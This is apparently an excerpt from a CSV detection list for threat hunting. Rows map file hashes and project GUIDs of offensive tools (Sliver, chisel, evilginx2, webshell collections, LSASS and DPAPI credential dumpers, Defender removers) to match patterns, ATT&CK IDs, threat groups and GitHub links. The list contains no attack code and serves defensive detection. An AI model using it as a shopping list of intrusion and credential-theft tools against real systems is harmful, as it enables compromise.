"*f89d5657f9c876889a0a1a0b5a7c599819d9cb731c529527af700c464b586bde*",".{0,1000}f89d5657f9c876889a0a1a0b5a7c599819d9cb731c529527af700c464b586bde.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","44246"
"*f8a603588cb91acf4c4a745f74326d202f4d63243fefaf048e1076174a18a50a*",".{0,1000}f8a603588cb91acf4c4a745f74326d202f4d63243fefaf048e1076174a18a50a.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","#filehash","N/A","10","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","44247"
"*f8a705f52d2b4587dfbf680d12d4b1af6d5ed91872257a756e2d5f4bdee24c45*",".{0,1000}f8a705f52d2b4587dfbf680d12d4b1af6d5ed91872257a756e2d5f4bdee24c45.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","44249"
"*f8ad55c6c6a80781eb944e9f865a82992f35c79c2ae5c7cf363536efe0e823cd*",".{0,1000}f8ad55c6c6a80781eb944e9f865a82992f35c79c2ae5c7cf363536efe0e823cd.{0,1000}","offensive_tool_keyword","EternalBlack","EternalRomance exploit implemented by Playbit EternalBlack often used by ransomware group like Dispossessor","T1210 - T1489 - T1105 - T1486","TA0001 - TA0002 - TA0009 - TA0040","EternalBlack","Dispossessor ","Exploitation tool","https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","44250"
"*f8af79bacf239d71ec2fab98d0ac0a9fc908b362b7228a0db33269700640e8ae*",".{0,1000}f8af79bacf239d71ec2fab98d0ac0a9fc908b362b7228a0db33269700640e8ae.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","44251"
"*f8c05d66a6fda535ef4e8e767c8e3ca5c93a0828ff03498b4b6cbe7e39bb617b*",".{0,1000}f8c05d66a6fda535ef4e8e767c8e3ca5c93a0828ff03498b4b6cbe7e39bb617b.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","0","#filehash","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","44255"
"*f8c05d66a6fda535ef4e8e767c8e3ca5c93a0828ff03498b4b6cbe7e39bb617b*",".{0,1000}f8c05d66a6fda535ef4e8e767c8e3ca5c93a0828ff03498b4b6cbe7e39bb617b.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","0","#filehash","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","44256"
"*f8c56ebf28222977e12ef4740c106dd6072e7964688ca2bf80d3cee2ec7edcfd*",".{0,1000}f8c56ebf28222977e12ef4740c106dd6072e7964688ca2bf80d3cee2ec7edcfd.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","44257"
"*f8ce37975b71cc8f51fcb93e3e32ec81a9b5da5cead7dcb987d0a3127bde027c*",".{0,1000}f8ce37975b71cc8f51fcb93e3e32ec81a9b5da5cead7dcb987d0a3127bde027c.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of UAC Bypass Techniques Weaponized as BOFs","T1548.002 - T1203 - T1055 - T1134.002","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/icyguider/UAC-BOF-Bonanza","1","0","#filehash","N/A","10","6","500","65","2024-02-21T22:07:54Z","2024-02-16T14:47:13Z","44259"
"*F8D2B9771E5AB15013A38543F05ECD747A23A6A33463D9A53106FDD15DADF002*",".{0,1000}F8D2B9771E5AB15013A38543F05ECD747A23A6A33463D9A53106FDD15DADF002.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","44260"
"*f8d85258f9c717fb629942c43b2218c96800252c3da18cbbc11839f790acc452*",".{0,1000}f8d85258f9c717fb629942c43b2218c96800252c3da18cbbc11839f790acc452.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","0","#filehash","N/A","8","2","184","24","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z","44261"
"*f8de181750ece6bfa74bdc2511b695b540a68d3640c245d0839e3a54ceb10347*",".{0,1000}f8de181750ece6bfa74bdc2511b695b540a68d3640c245d0839e3a54ceb10347.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","44264"
"*F8E0A09D99FF46019C0C3F2B725E9887D9AE53CB7FAD0BB233BC8612C2CA51F2*",".{0,1000}F8E0A09D99FF46019C0C3F2B725E9887D9AE53CB7FAD0BB233BC8612C2CA51F2.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","#filehash","AD Enumeration","7","10","1015","173","2025-04-11T14:35:08Z","2017-04-06T12:28:37Z","44266"
"*f8e1e243c0648d5bfcd2bb529571b4506f26897574537cffbf1399a171746713*",".{0,1000}f8e1e243c0648d5bfcd2bb529571b4506f26897574537cffbf1399a171746713.{0,1000}","offensive_tool_keyword","SharpAppLocker","Useful when you already bypassed AppLocker initially and you don't want to leave PS logs","T1086 - T1569.002 - T1070.003","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/Flangvik/SharpAppLocker","1","0","#filehash","N/A","7","1","99","16","2022-12-08T11:06:40Z","2020-08-01T12:58:36Z","44267"
"*f8f187ad240a6f23403c387c47ac1b3ce77301ff4ea1b3dbd639b76d65ca54ac*",".{0,1000}f8f187ad240a6f23403c387c47ac1b3ce77301ff4ea1b3dbd639b76d65ca54ac.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","44269"
"*f8f4e6097d1f3accb215891fc2767b4dba429c8a50681ed3179d224beaf01ac0*",".{0,1000}f8f4e6097d1f3accb215891fc2767b4dba429c8a50681ed3179d224beaf01ac0.{0,1000}","offensive_tool_keyword","POC","CVE-2024-6768: Improper validation of specified quantity in input produces an unrecoverable state in CLFS.sys causing a BSoD","T1499 - T1485","TA0043 - TA0042 - TA0005","N/A","N/A","Impact","https://github.com/fortra/CVE-2024-6768","1","0","#filehash","N/A","10","1","16","4","2024-08-12T20:48:52Z","2024-07-18T07:52:46Z","44270"
"*f8fb6472ba4d0cd5bd54881ee9a69a9d5fec9f5b6e40ec1b3850208eb045db56*",".{0,1000}f8fb6472ba4d0cd5bd54881ee9a69a9d5fec9f5b6e40ec1b3850208eb045db56.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","44272"
"*f8ffdb3b2c1b6172387a0e776a6f400c5117a0e525a3456465e3de4614555c10*",".{0,1000}f8ffdb3b2c1b6172387a0e776a6f400c5117a0e525a3456465e3de4614555c10.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","44273"
"*F90C57DF-CDE4-4CDE-A2B9-9124C307D53A*",".{0,1000}F90C57DF\-CDE4\-4CDE\-A2B9\-9124C307D53A.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","#GUIDproject","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","44276"
"*f90e3e0ba8b25e863b1d994d088376b2caedeed3b7bb5ee6c3f6e0e89bcaf023*",".{0,1000}f90e3e0ba8b25e863b1d994d088376b2caedeed3b7bb5ee6c3f6e0e89bcaf023.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","44277"
"*f91025122cd3b0f537db1eac70c44250530f34ea7521750bb4af7ff1c7af3b8c*",".{0,1000}f91025122cd3b0f537db1eac70c44250530f34ea7521750bb4af7ff1c7af3b8c.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","44278"
"*f9103918917348bf95b972701d8d4ccec36fdfd843792aa705b15454113cdfef*",".{0,1000}f9103918917348bf95b972701d8d4ccec36fdfd843792aa705b15454113cdfef.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","44279"
"*f91f2c86797c2b92c342f5a9617a14d5de59c05aa1bfeb50c32061789185d6bb*",".{0,1000}f91f2c86797c2b92c342f5a9617a14d5de59c05aa1bfeb50c32061789185d6bb.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","44280"
"*f92067d31fb234d9df105d85b053aff4a590270e0f25c6d8e563eda88bc8ba21*",".{0,1000}f92067d31fb234d9df105d85b053aff4a590270e0f25c6d8e563eda88bc8ba21.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","44281"
"*f9225d9986c9dc0cf328641af9c66eefc10f40c1a344d26bd847a219c88605a5*",".{0,1000}f9225d9986c9dc0cf328641af9c66eefc10f40c1a344d26bd847a219c88605a5.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","44282"
"*f923e44f1665a3cbae86b73bc2d3dcd74e928a7f358b75bb6dc*",".{0,1000}f923e44f1665a3cbae86b73bc2d3dcd74e928a7f358b75bb6dc.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","44283"
"*f927faa1d716f47708243946ccb6be7c9e4dcfe82ece1b159d63ce412c68d62e*",".{0,1000}f927faa1d716f47708243946ccb6be7c9e4dcfe82ece1b159d63ce412c68d62e.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44284"
"*f92b1b55d9d3ab4cf2eafed6dfbbac7ff6db4d07d8902cf57e625b6adaf02611*",".{0,1000}f92b1b55d9d3ab4cf2eafed6dfbbac7ff6db4d07d8902cf57e625b6adaf02611.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","44285"
"*f930268ff8e01585865f3190c10570175b0ef11c1b17172c93b413df8507bcbe*",".{0,1000}f930268ff8e01585865f3190c10570175b0ef11c1b17172c93b413df8507bcbe.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","44286"
"*f93277bd46aec52cc14875cb9439a8ab5f226cf4f857196e2b423391dd67ec93*",".{0,1000}f93277bd46aec52cc14875cb9439a8ab5f226cf4f857196e2b423391dd67ec93.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","#filehash","N/A","10","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","44287"
"*f93389056fa9ad53e214a468aa495adcb2ff1b75a64cd7df77a63a173066d05a*",".{0,1000}f93389056fa9ad53e214a468aa495adcb2ff1b75a64cd7df77a63a173066d05a.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","#filehash","N/A","10","1","87","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z","44288"
"*F93C99ED-28C9-48C5-BB90-DD98F18285A6*",".{0,1000}F93C99ED\-28C9\-48C5\-BB90\-DD98F18285A6.{0,1000}","offensive_tool_keyword","Lime-Crypter","An obfuscation tool for .Net + Native files","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/NYAN-x-CAT/Lime-Crypter","1","0","#GUIDproject","N/A","9","6","515","199","2024-04-22T21:31:18Z","2018-07-14T13:44:58Z","44289"
"*f945696926267701f5b3327ecb4af54169fd24f780db0f4caecf1fe447848007*",".{0,1000}f945696926267701f5b3327ecb4af54169fd24f780db0f4caecf1fe447848007.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","#filehash","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","44291"
"*f94889e1ba519e9e4e4e7bbee99f29ee46ab218b45d3a1b49549deba41f083ff*",".{0,1000}f94889e1ba519e9e4e4e7bbee99f29ee46ab218b45d3a1b49549deba41f083ff.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","0","#filehash","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","44292"
"*f94c9642833e1efd81b07dcb06bf653f61937ae8b7baf69b3731ac1132a66d52*",".{0,1000}f94c9642833e1efd81b07dcb06bf653f61937ae8b7baf69b3731ac1132a66d52.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","44293"
"*f94f938826dab5d26488e0bc6f5aa8e9eed3a395d1e9a0c9f2a49d877ea56225*",".{0,1000}f94f938826dab5d26488e0bc6f5aa8e9eed3a395d1e9a0c9f2a49d877ea56225.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","#filehash","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","44295"
"*f957ae5d8b980b8063af938aa7a1c1ab7293f3d63b49559a82fc3da0c651ea88*",".{0,1000}f957ae5d8b980b8063af938aa7a1c1ab7293f3d63b49559a82fc3da0c651ea88.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44297"
"*f9595881272cb6e11dcba5300706a44b2c8f6274313ce948d5f184ca973d0730*",".{0,1000}f9595881272cb6e11dcba5300706a44b2c8f6274313ce948d5f184ca973d0730.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","44298"
"*f96112996f7f6cc45c382096b622d7b8b909c38c116affbdb8cdd26f890763d2*",".{0,1000}f96112996f7f6cc45c382096b622d7b8b909c38c116affbdb8cdd26f890763d2.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","#filehash","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","44299"
"*f9677acd8599417cccac1cf15e623e68f2610f8425eaff77bf7a4364f1a1f0d3*",".{0,1000}f9677acd8599417cccac1cf15e623e68f2610f8425eaff77bf7a4364f1a1f0d3.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","44300"
"*f96865aaead8186eba43688e85b6632375f4f058dd1f867152fbc7b6d64344dd*",".{0,1000}f96865aaead8186eba43688e85b6632375f4f058dd1f867152fbc7b6d64344dd.{0,1000}","offensive_tool_keyword","o365-attack-toolkit","A toolkit to attack Office365","T1110 - T1114 - T1119 - T1197 - T1087.002","TA0001 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/o365-attack-toolkit","1","0","#filehash","N/A","10","10","1068","217","2020-11-06T12:09:26Z","2019-07-22T10:39:46Z","44301"
"*f97334c71892acdc50380141f0c6144363b7a55a1fe5adf01543b2adbd2d7e44*",".{0,1000}f97334c71892acdc50380141f0c6144363b7a55a1fe5adf01543b2adbd2d7e44.{0,1000}","offensive_tool_keyword","SharpSAMDump","SAM dumping via the registry in C#/.NET","T1003.002 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/jojonas/SharpSAMDump","1","0","#filehash","N/A","10","1","48","8","2025-01-16T07:08:58Z","2024-05-27T10:53:27Z","44302"
"*f97affb4f22b7d9c1cd53b5498df7701987d540daa4d607305d62e556971d101*",".{0,1000}f97affb4f22b7d9c1cd53b5498df7701987d540daa4d607305d62e556971d101.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44303"
"*f97e26cddde84739083ffd47cc19bcab4e8bfc638de45dcc46873a94d6747e60*",".{0,1000}f97e26cddde84739083ffd47cc19bcab4e8bfc638de45dcc46873a94d6747e60.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","44305"
"*f982b52ea6ec43f90e7adbb3a06ae09d9b775dca306962de90f91121d3da2ac2*",".{0,1000}f982b52ea6ec43f90e7adbb3a06ae09d9b775dca306962de90f91121d3da2ac2.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","44306"
"*f988bd7635bc12561e00eeb4aff027bd8014dc9b13600c8e8fb597ac9de5c3cf*",".{0,1000}f988bd7635bc12561e00eeb4aff027bd8014dc9b13600c8e8fb597ac9de5c3cf.{0,1000}","offensive_tool_keyword","SharpMiniDump","Create a minidump of the LSASS process from memory","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/b4rtik/SharpMiniDump","1","0","#filehash","N/A","10","3","260","49","2022-11-02T15:47:30Z","2019-09-15T13:45:42Z","44307"
"*f993560f69c40d4e80da65ac4db6b38e12e439230979336148abd479f091f8a8*",".{0,1000}f993560f69c40d4e80da65ac4db6b38e12e439230979336148abd479f091f8a8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44308"
"*f99b4944426d96892d0f6d8e20e7266a407cab5afa1eef1dd9eee791e0a0941e*",".{0,1000}f99b4944426d96892d0f6d8e20e7266a407cab5afa1eef1dd9eee791e0a0941e.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","44311"
"*f99e70dc19c3d3b3aeeefb1f8dd6b4a2e75d3195f87a7461cd26de4041629f35*",".{0,1000}f99e70dc19c3d3b3aeeefb1f8dd6b4a2e75d3195f87a7461cd26de4041629f35.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44312"
"*f9b44f6ba01b4841f672277a3459c5e2fb6325c1c7e2051ec41ef5a85574b66a*",".{0,1000}f9b44f6ba01b4841f672277a3459c5e2fb6325c1c7e2051ec41ef5a85574b66a.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","44317"
"*f9b67e1fce905f904c0516ff91e93d776e788f1bd0ac5a10c384b65d217f0c79*",".{0,1000}f9b67e1fce905f904c0516ff91e93d776e788f1bd0ac5a10c384b65d217f0c79.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44318"
